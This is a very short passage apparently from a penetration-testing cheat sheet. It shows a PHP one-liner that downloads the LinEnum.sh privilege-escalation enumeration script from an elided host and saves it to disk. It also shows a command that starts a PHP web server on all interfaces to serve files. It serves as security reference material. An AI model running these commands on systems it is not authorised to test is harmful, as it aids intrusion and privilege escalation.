githubEdit

PHP

1)

php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'	

2)

php -S 0.0.0.0:8080

Last updated